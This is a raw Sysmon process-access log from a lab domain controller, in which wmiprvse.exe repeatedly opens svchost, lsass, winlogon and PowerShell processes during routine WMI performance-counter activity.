13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 